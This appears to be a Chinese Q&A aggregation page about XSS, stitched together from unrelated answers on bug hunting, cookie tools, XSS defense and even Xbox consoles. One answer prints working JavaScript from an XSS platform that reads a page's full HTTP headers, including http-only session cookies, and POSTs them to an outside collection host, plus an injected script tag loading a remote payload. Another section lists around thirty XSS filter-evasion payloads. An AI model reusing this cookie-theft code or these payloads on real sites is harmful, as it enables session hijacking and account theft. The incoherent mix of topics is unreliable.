烏雲xss平台源碼

❶ 漏洞可以隨便挖嗎

今天測試時發現一個任意用戶登錄漏洞，簡單記錄一下（em...寫得真的很簡單的那種！）

登錄成功後的一個請求，裡麵包含了當前登錄用戶的用戶名和user_id:

漏洞挖掘類型總結

如果你剛剛好是一個剛剛學完基礎的小白，如果你剛剛好沒有參加各種培訓，完全自學。

那麼你的漏洞清單可能是這樣的。
暴力破解漏洞
sql注入漏洞
命令執行漏洞
xss漏洞（跨站腳本）
csrf漏洞（跨站偽造請求）
xxe漏洞
文件上傳漏洞
文件包含漏洞
各cms的公開漏洞
沒錯差不多就是這樣的。當然也有可能一些沒用寫到，因人而異。
如果你有幸看到一個大佬的漏洞清單。那麼有可能除了上面那些，還多了下面這幾項 邏輯漏洞
ssrf漏洞
信息泄露

js文件可能存在的未授權訪問
組合漏洞
……
然而這些也只是一部分，不過我不是大佬，不過歡迎大佬補存，下面我就單講一下我補充的幾種漏洞類型吧。

3: 漏洞類型詳解

正式開始前插一條，我之前對漏洞的定義有一點點誤解，以為只有上面列表上的才是漏洞，其實不然，只要可以給廠商帶來損失的全都是漏洞。邏輯漏洞也是基於這條。回顧一下自己的挖掘過程，其實漏掉了很多。

邏輯漏洞

邏輯漏洞也是一個經久不衰的話題，不過邏輯漏洞並不像前面幾種漏洞，可以用掃描器去掃，邏輯漏洞目前，據我所知是沒有一個掃描器可以敢說自己能掃到邏輯漏洞的。或許有的廠家敢說自己沒有一個sql注入，但是沒人敢說自己沒有邏輯漏洞（我想也沒有廠家敢說自己沒有sql注入吧，哈哈哈）。而且，由於現在waf，和防火牆的逐漸完善，sql注入，上傳等漏洞，也越來越難以查找和利用，而邏輯漏洞則不存在這種問題。
何為邏輯漏洞，就是由於開發者在開發過程中，由於代碼邏輯不嚴，而造成的一系列可以被攻擊者加以惡意利用的漏洞。而邏輯漏洞也是一類漏洞的總稱。

舉個例子最為常見的就是以低價購買任意價格的東西的支付漏洞，或者找回密碼流程式控制制不嚴格，導致的可以修改任意用戶的登陸密碼，還有越權，越權查看他人訂單，越權查看他人個人信息等等。
當然這只是一部分，我這里也只是一個引子，具體漏洞的原理以及介紹大家可以去自行搜索關鍵字，有很多大佬的文章就寫得比較好，不然我這篇文章就要寫個幾十頁了。一些漏洞詳情大家可以去看烏雲。

信息泄露

信息泄露漏洞顧名思義就是信息泄露，信息泄露也分好多種，如。

對於源碼泄露，大家可以去github上找，很多程序員會把源碼開放在github上，甚至有的人用戶名密碼都不改的，資料庫連接密碼啊直接存在源碼中，當然想我這種菜雞找到這種源碼泄露就直接提交了，有能力的大佬，直接就是一波審計，然後嘿嘿嘿。而對於員工信息泄露，可以在收集信息的時候收集賬號，然後放在社工庫跑跑，或者記錄下來賬號用來爆破。

組合漏洞

組合漏洞是一個可以吧低危漏洞變成高危漏洞的一個神奇的東西。比如你找到一個xss漏洞和一個csrf漏洞，如果兩個漏洞單獨提交，或許是兩個低危，或許是兩個忽略。但是如果你把你的xss和csrf組合起來就有可能變成一個高危漏洞，打組合拳，key師傅組合拳打的很厲害，向師傅看齊，key師傅給我說，挖到低危不要著急提交，存起來，萬一某一天碰見一另一個漏洞，組合一下，就可以一發入魂了。
說個小技巧，如果你想要詳細的漏洞列表，可以去多收集幾家src的漏洞說明手冊，然後去重，就是一份完美的漏洞列表。

4：個人提高漏洞挖掘能力的方法

這一節講一下挖掘漏洞應該如何提高和應該有哪些好的習慣。

細心放在第一位，是因為細心真的是非常非常非常重要，我有幸請教過很多大佬成功的秘籍，他們告訴我的第一個詞語就是細心，正所謂心細則挖天下。很多漏洞都是需要細心才可以發現，不放過數據包中的任何一個參數，不放過網站的任意一個點，我曾問過團隊的小石師傅，如何挖掘那些很多人都挖過的src，這么多人都挖過，一些功能點我還要在測一遍嗎。小石師傅並沒有給我直接回答，而是講了他一個漏洞的挖掘經歷，那是挖美團的時候，小石師傅直接主站開始挖，並且在個人資料一個很明顯的地方，挖到了一個儲存xss的高危漏洞。所以，在我們進行漏洞挖掘的時候，不要放棄任何一個可能存在漏洞的地方，每個人都有不同的挖掘方式，網站這么大，總會有幾個漏測的地方，並且一個漏洞修復了，誰敢保證，修復完了，就不能再修一個漏洞出來了呢。

耐心

耐心同細心一樣，可以說是一對cp。如果你本身就足夠信心，那麼我想你的耐心也不會差。如果說細心是你漏洞挖掘的利劍，那麼耐心就是你的磨刀石，很多時候，碰到一個破站盯幾天才能挖到一個漏洞，你堅持下來了就是勝利者，有人說挖洞，也是個運氣活，運氣好了隨隨便便就是幾個高危，運氣不好，幾天也挖不到一個。雖然有一定的道理，但是當你的能力足夠強，有了自己的套路，想挖漏洞還是輕松加愉快。

會看、會記

會看，會記。這個就簡單了，就是要多看多記，多看漏洞詳情，多看技術文章，漏洞詳情可以在烏雲看，還有網上很多人分享的案例，主要是烏雲。看完就要記，要讓你看的東西真正的成為你的東西，如果你面對一個廠商，還是有無從下手的感覺，就去烏雲看漏洞詳情，一個一個看，然後把漏洞出現的位置，以及使用的一些技巧記下來，成為屬於自己的漏洞挖掘手冊，這也是我最近在做的一個事情。還有一些好的文章，好的技巧，或許你一時半會也用不到，但是你要學會記，總有用到的一天。

懂收集

key師傅說過，漏洞挖掘說白了就是一個fuzz的過程，而fuzz最關鍵的是什麼，就是一本高效的字典，沒錯我們要學會收集字典，想公開的字典有fuzzdb，是一個非常好的fuzz字典合集，當然我們在收集他人字典的同時我們也要自己收集字典，曾經看到一個大佬，搜集了github大量的開發項目的路徑，然後組成字典。我也不要求小白可以寫程序然後自動收集字典，但是，我們在平時的漏洞挖掘過程中，遇到的一些東西還是要多多的去收集一下，逐步慢慢的形成自己的一本專用字典，絕對可以提高你的漏洞挖掘效率。當你有一本自己收集的字典時，相信你也成為一名大佬了。

勤動手

當你看了大量漏洞，記了大量筆記，這個時候，我相信你最需要的，就是實戰，實戰是可以把所學所看融會貫通的最快方法，沒有之一，只有實戰可以鍛煉自己的挖洞能力，和效率。看到新的漏洞多去搭建環境復現，這也是對能力的一種提升。

❷ 高分求web漏洞掃描器(針對sql漏洞和xss漏洞)的程序源碼,我願用我全部的積分作為回報

www.hkfx.net 這個紅客防線好像有你想要的工具，看它們官網好像是要收費的，具體你去了解一下吧

❸ wooyun(烏雲)平台接受 xss後cookie的工具是什麼

這樣用的 Chrome插件，或者明小子 啊D之類的修改cookie 或者桂林老兵的cookie欺騙工具也可以。

❹ xss 漏洞修復室 <script>alert('xss')</script>，應該放在哪我的站源碼如下：

<%
classtype=request.QueryString("classtype")
bigclass=request.QueryString("bigclass")
if bigclass="" then
rs.open "select * from news where ntype='"& classtype &" ' order by id desc",dconn,1,1
bigclass=rs("bigclass")
end if
rs.open "select * from news where bigclass='"& bigclass &"' order by id desc",dconn,1,1
%>
<script>alert('xss')</script>

❺ 如何使用xss平台盜取cookie

截取的是你的網站的 xss真正的原理是將代碼插入到某個網頁裡面，當瀏覽器訪問這個網頁的時候，就會執行你寫的代碼。如果這個代碼具有獲取cookies的功能，即可獲得當前頁面的cookies 然而不同的網站cookies是不同的，也是不允許互相訪問的。

❻ 如何通過 XSS 獲取受 http-only さcookie

該測試頁返回了完整的http頭，其中也包括了完整的cookie。混貼吧圈的應該都知道BDUSS是最關鍵的欄位，同時該欄位是受http-only保護的，網路SRC之前也因此下調了XSS的評分標准。
02.jpg

這樣，我們只要利用XSS平台的"指定頁面源碼讀取"模塊即可通過XSS獲取用戶的完整cookie。該模塊代碼如下:

code 區域
var u = 'http://buv.me/index.php?do=api&id={projectId}';

var cr;

if (document.charset) {

cr = document.charset

} else if (document.characterSet) {

cr = document.characterSet

};

function createXmlHttp() {

if (window.XMLHttpRequest) {

xmlHttp = new XMLHttpRequest()

} else {

var MSXML = new Array('MSXML2.XMLHTTP.5.0', 'MSXML2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP', 'Microsoft.XMLHTTP');

for (var n = 0; n < MSXML.length; n++) {

try {

xmlHttp = new ActiveXObject(MSXML[n]);

break

} catch(e) {}

}

}

}

createXmlHttp();

xmlHttp.onreadystatechange = writeSource;

xmlHttp.open("GET", "http://appstest..com/http/echoheader.php", true);

xmlHttp.send(null);

function postSource(cc) {

createXmlHttp();

url = u;

cc = "mycode=" + cc;

xmlHttp.open("POST", url, true);

xmlHttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");

xmlHttp.setRequestHeader("Content-length", cc.length);

xmlHttp.setRequestHeader("Connection", "close");

xmlHttp.send(cc)

}

function writeSource() {

if (xmlHttp.readyState == 4) {

var c = new postSource(xmlHttp.responseText)

}

}

由於是用xmlHttpRequest的形式讀源碼，且 http://appstest..com/ 的 Access-Control-Allow-Origin 為空，即默認不允許跨域，所以我們必須在同域下才能用xmlHttpRequest獲取到完整的cookie。

我在 http://wooyun.org/bugs/wooyun-2014-051026/trace/ 中有提到， http://appstest..com/abnormalTest/abnormaTest.php?typeName=single 可以自由構造XSS。我們向該頁面寫入如下代碼:

code 區域
<title>wooyun.org</title>

<p>超威藍貓@wooyun.org</p>

<script src=http://00f.me/XbSWCk></script>

❼ XSS小問題

page= ;alert(document.cookie);
你沒有閉合雙引號，導致；alert(document.cookie); 成了變數的值了
右鍵網頁源碼中如下：var page=";alert(document.cookie);";

正確答案其實有很多種只要閉合兩端的引號 中間的js代碼可以有多種變化。

";\u0061lert(document.cookie);"
";alert(document.cookie);//
這是很基礎的問題

慢慢學 多去wooyun知識庫看看

❽ xss帶盒子多重

xss帶盒子大學3.4公斤重，XSS是一台標準的次世代主機，擁有和XSX同代的架構，僅僅在核心頻率及規模上略有改變。
拓展資料:
1、xss的核心架構依然是AMD Zen2架構的八核CPU+定製RDNA 2 GPU，只不過頻率有所降低，此外GPU的計算單元縮減為20個，因此浮點性能僅有4TFLOPS，是XSX的三分之一。此外，內存帶寬略小，但是固態速度兩款保持了一致，意味著可以享受同等的快速讀取體驗。XSS的游戲目標最高同樣為120Hz高刷新率，不過解析度僅著力於2K（部分游戲也可插值4K），此外它還支持VRS可變刷新率、自動低延遲等新特性，因此HDMI 2.1也成為了XSS的標配。
2、在兼容性上，XSS不同於其他平台，僅僅能夠運行就謝天謝地。XSS的游戲兼容範圍不僅涵蓋了Xbox游戲機的整個生命周期，對於兼容游戲還會有畫面效果上的提升。這其中包含更高的解析度，更細致的紋理，更高更穩定的幀率，甚至還會有Auto HDR功能加持，通過系統級的色調映射，為游戲增加HDR模式。

❾ xss能玩神秘海域嗎

不能。
神秘海域是索尼獨占游戲，只能夠在PS主機上玩，而微軟平台自然是不能玩的。獨占游戲也是主機游戲的一大競爭優勢，讓玩該游戲的玩家只能去索尼。
《神秘海域》（英文：Uncharted）是SCE發行的動作冒險游戲系列，主要由SCE旗下頑皮狗工作室製作。另有一部PlayStation VITA平台的作品由Bend Studio製作。
游戲設定在原始叢林、熱帶雨林、沙漠腹地、雪山高原、古代遺跡等地，以電影方式呈現。主人公內森·德雷克要面對各種各樣的敵人，最終找到寶藏。

❿ 哪有放XSS跨站腳本工具的第三方工具/

不修改網站程序,使用第三方工具來防範XSS跨站式腳本攻擊

網站要怎麼防範常見的XSS跨站式腳本攻擊呢，我們先從XSS跨站式腳本攻擊的原理來說起。

網站遭受XSS跨站式腳本攻擊的基本原理

1.本地利用漏洞，這種漏洞存在於頁面中客戶端腳本自身。

其攻擊過程如下所示：

A給B發送一個惡意構造了Web的URL。

B點擊並查看了這個URL。

惡意頁面中的javaScript打開一個具有漏洞的HTML頁面並將其安裝在B電腦上。

具有漏洞的HTML頁麵包含了在B電腦本地域執行的JavaScript。

A的惡意腳本可以在B的電腦上執行B所持有的許可權下的命令。

2反射式漏洞，這種漏洞和本地利用漏洞有些類似，不同的是Web客戶端使用Server端腳本生成頁面為用戶提供數據時，如果未經驗證的用戶數據被包含在頁面中而未經HTML實體編碼，客戶端代碼便能夠注入到動態頁面中。

其攻擊過程如下：

A經常瀏覽某個網站，此網站為B所擁有。B的站點運行A使用用戶名/密碼進行登錄，並存儲敏感信息（比如銀行帳戶信息）。

C發現B的站點包含反射性的XSS漏洞。

C編寫一個利用漏洞的URL，並將其冒充為來自B的郵件發送給A。

A在登錄到B的站點後，瀏覽C提供的URL。

嵌入到URL中的惡意腳本在A的瀏覽器中執行，就像它直接來自B的伺服器一樣。此腳本盜竊敏感信息（授權、信用卡、帳號信息等）然後在A完全不知情的情況下將這些信息發送到C的Web站點。

3存儲式漏洞，該類型是應用最為廣泛而且有可能影響到Web伺服器自身安全的漏洞，駭客將攻擊腳本上傳到Web伺服器上，使得所有訪問該頁面的用戶都面臨信息泄漏的可能，其中也包括了Web伺服器的管理員。

其攻擊過程如下：

B擁有一個Web站點，該站點允許用戶發布信息/瀏覽已發布的信息。

C注意到B的站點具有存儲式的XXS漏洞。

C發布一個熱點信息，吸引其它用戶紛紛閱讀。

B或者是任何的其他人如A瀏覽該信息，其會話cookies或者其它信息將被C盜走。

類型A直接威脅用戶個體，而類型B和存儲式漏洞所威脅的對象都是企業級Web應用。

網站遭受XSS跨站式腳本攻擊的基本方式

1. DOM-based cross-site scripting

頁面本身包含一些DOM對象的操作，如果未對輸入的參數進行處理，可能會導致執行惡意腳本。如下面一些DOM操作：

document.URL

document.URLUnencoded

document.location (and many of its properties)

document.referrer

window.location (and many of its properties)

舉個例子，假如某個脆弱的頁面的代碼如下：

<HTML>

<TITLE>Welcome!</TITLE>

Hi

<SCRIPT>

var pos=document.URL.indexOf("name=")+5;

document.write(document.URL.substring(pos,document.URL.length));

</SCRIPT>

<BR>

Welcome to our system

…

</HTML>

攻擊者使用如下的URL訪問時，則非常危險：

http://www.vulnerable.site/welcome.html?name=<script>alert(document.cookie)</script>

試了一下，貌似IE、FireFox等瀏覽器默認 對<script>alert(document.cookie)</script>進行了編碼，阻止了腳本的執行。但是對於 DOM操作還是要更加謹慎啊，比如把上面的頁面修改一下，安全性就增強了不少：

<SCRIPT>

var pos=document.URL.indexOf("name=")+5;

var name=document.URL.substring(pos,document.URL.length);

if (name.match(/^[a-zA-Z0-9]$/))

{

document.write(name);

}

else

{

window.alert("Security error");

}

</SCRIPT>

2. Reflected cross-site scripting

也被稱為None-Persistent cross-site scripting，即，非持久化的XSS攻擊，是我們通常所說的，也是最常用，使用最廣的一種方式。它通過給別人發送帶有惡意腳本代碼參數的URL，當 URL地址被打開時，特有的惡意代碼參數被HTML解析、執行。它的特點是非持久化，必須用戶點擊帶有特定參數的鏈接菜能引起。

3. Persistent cross-site scripting

持久化XSS攻擊，指的是惡意腳本代碼被存儲進被攻擊的資料庫，當其他用戶正常瀏覽網頁時，站點從資料庫中讀取了非法用戶存入非法數據，惡意腳本代碼被執行。這種攻擊類型通常在留言板等地方出現。

實施方式

我們來試一把Reflected cross-site scripting。當我們在某網站輸入參數XXX，發現參數XXX原樣的出現在了頁面源碼中：

1. <input type="text" class="Seach" name="w" value="XXX" />

OK，可以開始做文章了，我們將XXX替換為：abc"/><script>alert('haha')</script><a href="，返回的HTML代碼如下：

1. <input type="text" class="Seach" name="w" value="abc"/>
2. <script>alert('haha')</script><!--" />

這樣，<script>alert('haha')</script>被執行了。這里再舉例一些XSS攻擊行為：

1. <IMG SRC="javascript:alert('XSS');">
2. <IMG SRC=javascript:alert('XSS')>
3. <IMG SRC="javascript:alert(String.fromCharCode(88,83,83))">
4. <IMG SRC="jav ascript:alert('XSS');">
5. <SCRIPT/XSS SRC="http://example.com/xss.js"></SCRIPT>
6. <<SCRIPT>alert("XSS");//<</SCRIPT>
7. <iframe src=http://example.com/scriptlet.html <
8. <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
9. <BODY BACKGROUND="javascript:alert('XSS')">
10. <BODY ONLOAD=alert(document.cookie)>
11. <BODY onload!#$%&()*~+-_.,:;?@[/|"]^`=alert("XSS")>
12. <IMG DYNSRC="javascript:alert('XSS')">
13. <IMG DYNSRC="javascript:alert('XSS')">
14. <BR SIZE="&{alert('XSS')}">
15. <IMG SRC='vbscript:msgbox("XSS")'>
16. <TABLE BACKGROUND="javascript:alert('XSS')">
17. <DIV STYLE="width: expression(alert('XSS'));">
18. <DIV STYLE="background-image: url(javascript:alert('XSS'))">
19. <STYLE TYPE="text/javascript">alert('XSS');</STYLE>
20. <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
21. <?='<SCRIPT>alert("XSS")</SCRIPT>'?>
22. <A HREF="javascript:document.location='http://www.example.com/'">XSS</A>
23. <IMG SRC=javascript:alert('XSS')>
24. <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
25. a="get";
26. b="URL(""";
27. c="javascript:";
28. d="alert('XSS');"")";
29. eval(a+b+c+d);

總結一下，要防止XSS跨站式腳本攻擊主要是要在查詢字元串(QueryString)，表單數據（PostData）以及Cookie甚至HTTP報頭（Header）中防止掉一些javascript關鍵字和一些敏感的字元（單引號，分號）以及SQL語言的關鍵字，以及防止他們使用encode編碼。

用ASP或者PHP腳本來實現上面的這些想起來就很麻煩。下面就來介紹下用一個第三方工具IISUTM來處理上面我們說到的問題。

准備工作：先去www.iisutm.com下載最新的IISUTM版本。

根據IISUTM網站防火牆安裝及操作手冊 中的說明把IISUTM部署到你的伺服器上來，這里需要注意的是使用Windows 2003+iis6的伺服器，需要開啟iis中「以IIS5.0 隔離模式運行 www 服務」選項才能正常使用該軟體。

安裝完成，通過瀏覽器訪問IISUTM的配置管理界面默認的是http://127.0.0.1:8362，這個是私有地址，只能在該伺服器上訪問，你需要任何地方都能訪問的話，可以在安裝的時候IP地址的選項那裡填入你伺服器的公網IP地址，和你所開放的埠。這樣你就可以通過你配置的地址進行訪問，或者你可以在iis中直接管理名為IISUTM的站點。

登陸管理界面後點擊上面導航欄中的「基本設置」，然後點擊左邊菜單的「防XSS攻擊」鏈接。

開啟該鏈接里所有的選項，選中之後IISUTM會自動保存配置，下面的「使用不允許的發送序列」是該軟體提供的XSS攻擊關鍵字的特徵庫，你可以根據你網站的情況進行更改（最好不要修改）。

確認以上的配置以後，你可以返回到IISUTM管理界面的首頁，這里會列出最近伺服器遭受到的攻擊以及詳細，趕緊去看看你的網站是不是隨時有人在進行SQL注入吧，以及哪些攻擊被IISUTM處理掉了。